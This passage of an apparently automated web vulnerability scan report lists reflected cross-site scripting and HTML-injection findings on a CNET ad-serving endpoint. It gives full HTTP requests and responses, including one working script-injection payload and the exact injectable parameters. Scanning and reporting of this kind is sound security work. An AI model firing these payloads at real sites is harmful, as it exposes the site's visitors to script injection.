GET /mac-ad?CELT=ifc&BRAND=5fc705"><script>alert(1)</script>4aa2c504d19&SITE=3&ADSTYLE=NOOVERGIF&_RGROUP=13060 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:30:20 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 04 May 2011 01:30:20 GMT
Content-Length: 2433

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<img src="http://adlog.com.com/adlog/i/r=13060&amp;sg=512533&amp;o=&amp;h=cn&amp;p=2&amp;b=5fc705"><script>alert(1)</script>4aa2c504d19&amp;l=en_US&amp;site=3&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=01phx1-ad-e16:4DC066DE4A6633&amp;orh=admeld.com&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld
...[SNIP]...

6.30. http://mads.cnet.com/mac-ad [CARRIER parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the CARRIER request parameter is copied into the HTML document as plain text between tags. The payload 7d834<a>c27462c4717 was submitted in the CARRIER parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%207d834<a>c27462c4717&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:34:51 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:34:51 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%207d834<a>c27462c4717&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-A
...[SNIP]...

6.31. http://mads.cnet.com/mac-ad [CELT parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 11f74<a>8d02a022973 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?CELT=ifc11f74<a>8d02a022973&BRAND=5&SITE=3&ADSTYLE=NOOVERGIF&_RGROUP=13060 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:48 GMT
Server: Apache/2.2
Content-Length: 389
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Wed, 04 May 2011 01:29:48 GMT

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="CELT=ifc11f74<a>8d02a022973&BRAND=5&SITE=3&ADSTYLE=NOOVERGIF&_RGROUP=13060" _REQ_NUM="0" --><!-- MAC-AD STATUS: ; MAPPING UNEXPECTED CELT &quot;ifc11f74
...[SNIP]...

6.32. http://mads.cnet.com/mac-ad [CID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the CID request parameter is copied into the HTML document as plain text between tags. The payload 3d24d<a>ffba15ebc0a was submitted in the CID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=23d24d<a>ffba15ebc0a&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:33:16 GMT
Server: Apache/2.2
Content-Length: 621
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:33:16 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=23d24d<a>ffba15ebc0a&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesO
...[SNIP]...

6.33. http://mads.cnet.com/mac-ad [CNET-PAGE-GUID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the CNET-PAGE-GUID request parameter is copied into the HTML document as plain text between tags. The payload 4b804<a>92426b57967 was submitted in the CNET-PAGE-GUID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs4b804<a>92426b57967&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:37:03 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:37:03 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs4b804<a>92426b57967&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='109' PTYPE='8300' NCAT=
...[SNIP]...

6.34. http://mads.cnet.com/mac-ad [COOKIE%3AANON_ID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the COOKIE%3AANON_ID request parameter is copied into the HTML document as plain text between tags. The payload 51d24<a>369b9fd8ded was submitted in the COOKIE%3AANON_ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs51d24<a>369b9fd8ded&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:39 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:38:39 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs51d24<a>369b9fd8ded&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='109' PTYPE='8300' NCAT='17939:' CID='2' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13-13-Js
...[SNIP]...

6.35. http://mads.cnet.com/mac-ad [DVAR_INSTLANG parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into the HTML document as plain text between tags. The payload d17f2<a>71883aa5e1a was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-USd17f2<a>71883aa5e1a&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:08 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:38:08 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-USd17f2<a>71883aa5e1a&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='109' PTYPE='8300' NCAT='17939:' CID='2' TO BEACON TEXT)
...[SNIP]...

6.36. http://mads.cnet.com/mac-ad [GLOBAL&CLIENT:ID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload ca78d<a>d55f1811ef9 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJSca78d<a>d55f1811ef9&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:30:20 GMT
Server: Apache/2.2
Content-Length: 604
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:30:20 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJSca78d<a>d55f1811ef9&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_
...[SNIP]...

6.37. http://mads.cnet.com/mac-ad [MFG parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the MFG request parameter is copied into the HTML document as plain text between tags. The payload 93406<a>7fc7d9d19ca was submitted in the MFG parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%2093406<a>7fc7d9d19ca&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:33:51 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:33:51 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%2093406<a>7fc7d9d19ca&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _RE
...[SNIP]...

6.38. http://mads.cnet.com/mac-ad [NCAT parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload 4a259<a>912498d9b9d was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A4a259<a>912498d9b9d&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:10 GMT
Server: Apache/2.2
Content-Length: 623
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:32:10 GMT

